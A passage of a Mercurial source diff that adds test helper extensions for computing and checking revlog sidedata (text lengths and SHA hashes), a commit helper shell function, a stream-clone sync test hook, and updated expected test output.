received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
@@ -1196,7 +1197,8 @@
$ cat clone-output | grep "received frame"
received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos)
received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
- received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
+ received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !)
+ received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !)
received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos)
received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos)
received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/common.sh Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,7 @@
+mkcommit() {
+ name="$1"
+ shift
+ echo "$name" > "$name"
+ hg add "$name"
+ hg ci -m "$name" "$@"
+}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-sidedata-2.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,50 @@
+# coding: utf8
+# ext-sidedata-2.py - small extension to test (differently) the sidedata logic
+#
+# Simulates a client for a complex sidedata exchange.
+#
+# Copyright 2021 Raphaël Gomès <rgomes@octobus.net>
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+
+from __future__ import absolute_import
+
+import hashlib
+import struct
+
+from mercurial.revlogutils import sidedata as sidedatamod
+
+
+def compute_sidedata_1(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text))
+ return sidedata
+
+
+def compute_sidedata_2(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sha256 = hashlib.sha256(text).digest()
+ sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256)
+ return sidedata
+
+
+def reposetup(ui, repo):
+ # Sidedata keys happen to be the same as the categories, easier for testing.
+ for kind in (b'changelog', b'manifest', b'filelog'):
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST1,
+ (sidedatamod.SD_TEST1,),
+ compute_sidedata_1,
+ )
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST2,
+ (sidedatamod.SD_TEST2,),
+ compute_sidedata_2,
+ )
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-sidedata-3.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,88 @@
+# coding: utf8
+# ext-sidedata-3.py - small extension to test (differently still) the sidedata
+# logic
+#
+# Simulates a client for a complex sidedata exchange.
+#
+# Copyright 2021 Raphaël Gomès <rgomes@octobus.net>
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+
+from __future__ import absolute_import
+
+import hashlib
+import struct
+
+from mercurial import (
+ extensions,
+ revlog,
+)
+
+from mercurial.revlogutils import sidedata as sidedatamod
+
+
+def compute_sidedata_1(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text))
+ return sidedata
+
+
+def compute_sidedata_2(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sha256 = hashlib.sha256(text).digest()
+ sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256)
+ return sidedata
+
+
+def compute_sidedata_3(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sha384 = hashlib.sha384(text).digest()
+ sidedata[sidedatamod.SD_TEST3] = struct.pack('>48s', sha384)
+ return sidedata
+
+
+def wrapaddrevision(
+ orig, self, text, transaction, link, p1, p2, *args, **kwargs
+):
+ if kwargs.get('sidedata') is None:
+ kwargs['sidedata'] = {}
+ sd = kwargs['sidedata']
+ sd = compute_sidedata_1(None, self, None, sd, text=text)
+ kwargs['sidedata'] = compute_sidedata_2(None, self, None, sd, text=text)
+ return orig(self, text, transaction, link, p1, p2, *args, **kwargs)
+
+
+def extsetup(ui):
+ extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision)
+
+
+def reposetup(ui, repo):
+ # Sidedata keys happen to be the same as the categories, easier for testing.
+ for kind in (b'changelog', b'manifest', b'filelog'):
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST1,
+ (sidedatamod.SD_TEST1,),
+ compute_sidedata_1,
+ )
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST2,
+ (sidedatamod.SD_TEST2,),
+ compute_sidedata_2,
+ )
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST3,
+ (sidedatamod.SD_TEST3,),
+ compute_sidedata_3,
+ )
+ repo.register_wanted_sidedata(sidedatamod.SD_TEST1)
+ repo.register_wanted_sidedata(sidedatamod.SD_TEST2)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-sidedata-4.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,19 @@
+# coding: utf8
+# ext-sidedata-4.py - small extension to test (differently still) the sidedata
+# logic
+#
+# Simulates a server for a complex sidedata exchange.
+#
+# Copyright 2021 Raphaël Gomès <rgomes@octobus.net>
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+
+from __future__ import absolute_import
+
+from mercurial.revlogutils import sidedata
+
+
+def reposetup(ui, repo):
+ repo.register_wanted_sidedata(sidedata.SD_TEST2)
+ repo.register_wanted_sidedata(sidedata.SD_TEST3)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-sidedata-5.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,81 @@
+# coding: utf8
+# ext-sidedata-5.py - small extension to test (differently still) the sidedata
+# logic
+#
+# Simulates a server for a simple sidedata exchange.
+#
+# Copyright 2021 Raphaël Gomès <rgomes@octobus.net>
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+
+from __future__ import absolute_import
+
+import hashlib
+import struct
+
+from mercurial import (
+ extensions,
+ revlog,
+)
+
+
+from mercurial.revlogutils import sidedata as sidedatamod
+
+
+def compute_sidedata_1(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text))
+ return sidedata
+
+
+def compute_sidedata_2(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sha256 = hashlib.sha256(text).digest()
+ sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256)
+ return sidedata
+
+
+def reposetup(ui, repo):
+ # Sidedata keys happen to be the same as the categories, easier for testing.
+ for kind in (b'changelog', b'manifest', b'filelog'):
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST1,
+ (sidedatamod.SD_TEST1,),
+ compute_sidedata_1,
+ )
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST2,
+ (sidedatamod.SD_TEST2,),
+ compute_sidedata_2,
+ )
+
+ # We don't register sidedata computers because we don't care within these
+ # tests
+ repo.register_wanted_sidedata(sidedatamod.SD_TEST1)
+ repo.register_wanted_sidedata(sidedatamod.SD_TEST2)
+
+
+def wrapaddrevision(
+ orig, self, text, transaction, link, p1, p2, *args, **kwargs
+):
+ if kwargs.get('sidedata') is None:
+ kwargs['sidedata'] = {}
+ sd = kwargs['sidedata']
+ ## let's store some arbitrary data just for testing
+ # text length
+ sd[sidedatamod.SD_TEST1] = struct.pack('>I', len(text))
+ # and sha2 hashes
+ sha256 = hashlib.sha256(text).digest()
+ sd[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256)
+ return orig(self, text, transaction, link, p1, p2, *args, **kwargs)
+
+
+def extsetup(ui):
+ extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision)
--- a/tests/testlib/ext-sidedata.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/testlib/ext-sidedata.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# ext-sidedata.py - small extension to test the sidedata logic
#
-# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net)
+# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -40,19 +40,21 @@
return orig(self, text, transaction, link, p1, p2, *args, **kwargs)
-def wraprevision(orig, self, nodeorrev, *args, **kwargs):
- text = orig(self, nodeorrev, *args, **kwargs)
+def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs):
+ text, sd = orig(self, nodeorrev, *args, **kwargs)
if getattr(self, 'sidedatanocheck', False):
- return text
+ return text, sd
+ if self.version & 0xFFFF != 2:
+ return text, sd
if nodeorrev != nullrev and nodeorrev != nullid:
- sd = self.sidedata(nodeorrev)
- if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]:
+ cat1 = sd.get(sidedata.SD_TEST1)
+ if cat1 is not None and len(text) != struct.unpack('>I', cat1)[0]:
raise RuntimeError('text size mismatch')
- expected = sd[sidedata.SD_TEST2]
+ expected = sd.get(sidedata.SD_TEST2)
got = hashlib.sha256(text).digest()
- if got != expected:
+ if expected is not None and got != expected:
raise RuntimeError('sha256 mismatch')
- return text
+ return text, sd
def wrapgetsidedatacompanion(orig, srcrepo, dstrepo):
@@ -81,7 +83,14 @@
def extsetup(ui):
extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision)
- extensions.wrapfunction(revlog.revlog, 'revision', wraprevision)
+ extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata)
extensions.wrapfunction(
upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion
)
+
+
+def reposetup(ui, repo):
+ # We don't register sidedata computers because we don't care within these
+ # tests
+ repo.register_wanted_sidedata(sidedata.SD_TEST1)
+ repo.register_wanted_sidedata(sidedata.SD_TEST2)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-stream-clone-steps.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,31 @@
+from __future__ import absolute_import
+
+from mercurial import (
+ encoding,
+ extensions,
+ streamclone,
+ testing,
+)
+
+
+WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1']
+WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2']
+
+
+def _test_sync_point_walk_1(orig, repo):
+ testing.write_file(WALKED_FILE_1)
+
+
+def _test_sync_point_walk_2(orig, repo):
+ assert repo._currentlock(repo._lockref) is None
+ testing.wait_file(WALKED_FILE_2)
+
+
+def uisetup(ui):
+ extensions.wrapfunction(
+ streamclone, '_test_sync_point_walk_1', _test_sync_point_walk_1
+ )
+
+ extensions.wrapfunction(
+ streamclone, '_test_sync_point_walk_2', _test_sync_point_walk_2
+ )